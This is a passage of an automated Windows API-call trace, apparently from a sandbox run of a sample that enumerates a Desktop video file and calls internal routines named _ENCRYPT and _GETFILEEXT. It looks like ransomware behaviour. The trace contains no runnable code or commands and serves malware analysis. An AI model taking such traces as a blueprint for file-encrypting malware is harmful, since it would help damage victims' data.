(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74) returned 0x7800d0 [0030.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=58, lpWideCharStr=0x7800d0, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv") returned 58 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.319] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.320] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0030.321] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.322] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.322] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0030.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cf10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.322] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0030.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.323] CloseHandle (hObject=0x128) returned 1 [0030.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.323] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.324] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.324] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.324] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.324] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.324] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.324] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.324] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.324] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.324] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8276fa90, ftCreationTime.dwHighDateTime=0x1d5bada, ftLastAccessTime.dwLowDateTime=0x58a2bd00, ftLastAccessTime.dwHighDateTime=0x1d5ba83, ftLastWriteTime.dwLowDateTime=0x58a2bd00, ftLastWriteTime.dwHighDateTime=0x1d5ba83, nFileSizeHigh=0x0, nFileSizeLow=0x140b1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pRtMXaA65Jvr0xt.mkv", cAlternateFileName="PRTMXA~1.MKV")) returned 0x7c20c0 [0030.324] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.324] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8276fa90, ftCreationTime.dwHighDateTime=0x1d5bada, ftLastAccessTime.dwLowDateTime=0x58a2bd00, ftLastAccessTime.dwHighDateTime=0x1d5ba83, ftLastWriteTime.dwLowDateTime=0x58a2bd00, ftLastWriteTime.dwHighDateTime=0x1d5ba83, nFileSizeHigh=0x0, nFileSizeLow=0x140b1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pRtMXaA65Jvr0xt.mkv", cAlternateFileName="PRTMXA~1.MKV")) returned 0x7c20c0 [0030.325] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.325] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS 